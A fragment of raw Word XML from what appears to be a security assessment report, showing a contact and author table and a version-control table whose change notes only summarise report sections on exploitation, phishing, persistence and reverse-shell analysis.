            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3E2F22D3"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Classification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6690" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1F72F646" w14:textId="77777777" w:rsidR="003B094A" w:rsidRDefault="003B094A" w:rsidP="007D2747">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B094A" w14:paraId="60120141" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="470"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2220" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="7F7F7F"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7F35E76F"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Contacts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6690" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="08CE6F91" w14:textId="261E1EAD" w:rsidR="003B094A" w:rsidRDefault="002D44D8" w:rsidP="007D2747">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>0582651677</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B094A" w14:paraId="1C7DF0E4" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="470"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2220" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="7F7F7F"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="41C3E7DB"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6690" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="61CDCEAD" w14:textId="3F821521" w:rsidR="003B094A" w:rsidRDefault="002D44D8" w:rsidP="007D2747">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>Nauman Munir</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6BB9E253" w14:textId="77777777" w:rsidR="003B094A" w:rsidRDefault="003B094A" w:rsidP="007D2747">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23DE523C" w14:textId="77777777" w:rsidR="003B094A" w:rsidRDefault="003B094A" w:rsidP="007D2747">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DC77A61" w14:textId="77777777" w:rsidR="003B094A" w:rsidRDefault="00963AEF" w:rsidP="007D2747">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_heading=h.30j0zll" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>2. Version Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E56223" w14:textId="77777777" w:rsidR="003B094A" w:rsidRDefault="003B094A" w:rsidP="007D2747">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07547A01" w14:textId="77777777" w:rsidR="003B094A" w:rsidRDefault="003B094A" w:rsidP="007D2747">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a8"/>
        <w:tblW w:w="9990" w:type="dxa"/>
        <w:tblInd w:w="-115" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0400" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1440"/>
        <w:gridCol w:w="2250"/>
        <w:gridCol w:w="2250"/>
        <w:gridCol w:w="4050"/>
      </w:tblGrid>
      <w:tr w:rsidR="003B094A" w14:paraId="795A0DD7" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="794"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="A6A6A6"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="A6A6A6"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="A6A6A6"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="A6A6A6"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6B814A1E" w14:textId="77777777" w:rsidR="003B094A" w:rsidRDefault="00963AEF" w:rsidP="002D44D8">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2250" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="A6A6A6"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="A6A6A6"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="A6A6A6"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="A6A6A6"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="47E06360" w14:textId="04E80B81" w:rsidR="003B094A" w:rsidRDefault="00963AEF" w:rsidP="002D44D8">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2250" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="A6A6A6"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="A6A6A6"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="A6A6A6"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="A6A6A6"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="06859C16" w14:textId="550DFEA6" w:rsidR="003B094A" w:rsidRDefault="00963AEF" w:rsidP="002D44D8">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Author</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4050" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="A6A6A6"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="A6A6A6"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="A6A6A6"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="A6A6A6"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="617C06BC" w14:textId="14EF0C47" w:rsidR="003B094A" w:rsidRDefault="00963AEF" w:rsidP="002D44D8">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003B094A" w14:paraId="10AA36BA" w14:textId="77777777" w:rsidTr="002D44D8">
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="794"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="144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4B3AA50C" w14:textId="77777777" w:rsidR="003B094A" w:rsidRDefault="00963AEF" w:rsidP="002D44D8">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1.0</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379DCE26" w14:textId="31B6AC27" w:rsidR="003B094A" w:rsidRDefault="002D44D8" w:rsidP="002D44D8">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>20/02/25</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5043CB0F" w14:textId="25155231" w:rsidR="003B094A" w:rsidRDefault="002D44D8" w:rsidP="002D44D8">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Nauman Munir</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="40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07459315" w14:textId="11CC504A" w:rsidR="003B094A" w:rsidRDefault="0021082F" w:rsidP="002D44D8">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0021082F">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Initial draft created with basic exploitation, phishing setup, and initial network analysis.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44D8" w14:paraId="0C7AD1C6" w14:textId="77777777" w:rsidTr="002D44D8">
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="794"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="144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3C49AFC7" w14:textId="3CF84232" w:rsidR="002D44D8" w:rsidRDefault="002D44D8" w:rsidP="002D44D8">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>1.1</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71E93730" w14:textId="30BE0B27" w:rsidR="002D44D8" w:rsidRDefault="002D44D8" w:rsidP="002D44D8">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>21/02/25</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1AF71ABC" w14:textId="51798461" w:rsidR="002D44D8" w:rsidRDefault="002D44D8" w:rsidP="002D44D8">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Omar Hussan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="40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14C96029" w14:textId="28F09AB0" w:rsidR="002D44D8" w:rsidRDefault="0021082F" w:rsidP="002D44D8">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0021082F">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Revised report with added details on payload modifications, persistence methods, and refined analysis.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44D8" w14:paraId="38AF8A58" w14:textId="77777777" w:rsidTr="0021082F">
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="794"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="144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2F14005C" w14:textId="24E88A20" w:rsidR="002D44D8" w:rsidRDefault="002D44D8" w:rsidP="002D44D8">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1.2</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2D5E93E7" w14:textId="14F75551" w:rsidR="002D44D8" w:rsidRDefault="0021082F" w:rsidP="002D44D8">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>22/02/25</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205CCD87" w14:textId="3BC0A9DE" w:rsidR="002D44D8" w:rsidRDefault="0021082F" w:rsidP="002D44D8">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0021082F">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Asma Jamal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="40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234567E5" w14:textId="5361F64C" w:rsidR="002D44D8" w:rsidRDefault="0021082F" w:rsidP="002D44D8">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0021082F">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Finalized report incorporating complete evidence, enhanced remediation steps, and comprehensive command logs.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0021082F" w14:paraId="20647ADB" w14:textId="77777777" w:rsidTr="0021082F">
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="794"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="144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414F3AF5" w14:textId="2395907D" w:rsidR="0021082F" w:rsidRDefault="0021082F" w:rsidP="002D44D8">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1.3</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1795A924" w14:textId="6107D101" w:rsidR="0021082F" w:rsidRDefault="0021082F" w:rsidP="002D44D8">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0021082F">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>23/02/25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="22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63867F46" w14:textId="4473630E" w:rsidR="0021082F" w:rsidRPr="0021082F" w:rsidRDefault="0021082F" w:rsidP="002D44D8">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Nauman Munir</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4050" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="A6A6A6"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="A6A6A6"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="A6A6A6"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="A6A6A6"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="39CD9F49" w14:textId="59656D99" w:rsidR="0021082F" w:rsidRPr="0021082F" w:rsidRDefault="0021082F" w:rsidP="002D44D8">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0021082F">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Incorporated team </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0021082F">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>feedback;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0021082F">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> enhanced evidence documentation and refined reverse shell analysis.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0021082F" w14:paraId="739B6178" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="794"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="144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601A9C3E" w14:textId="1578B77B" w:rsidR="0021082F" w:rsidRDefault="0021082F" w:rsidP="002D44D8">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>2.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="225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77E8DAC6" w14:textId="637C4DA0" w:rsidR="0021082F" w:rsidRPr="0021082F" w:rsidRDefault="0021082F" w:rsidP="002D44D8">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>23/02/25</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="225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3B1DDF7B" w14:textId="704B5833" w:rsidR="0021082F" w:rsidRDefault="0021082F" w:rsidP="002D44D8">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0021082F">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Nauman Munir, Omar Hussan, Asma Jamal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
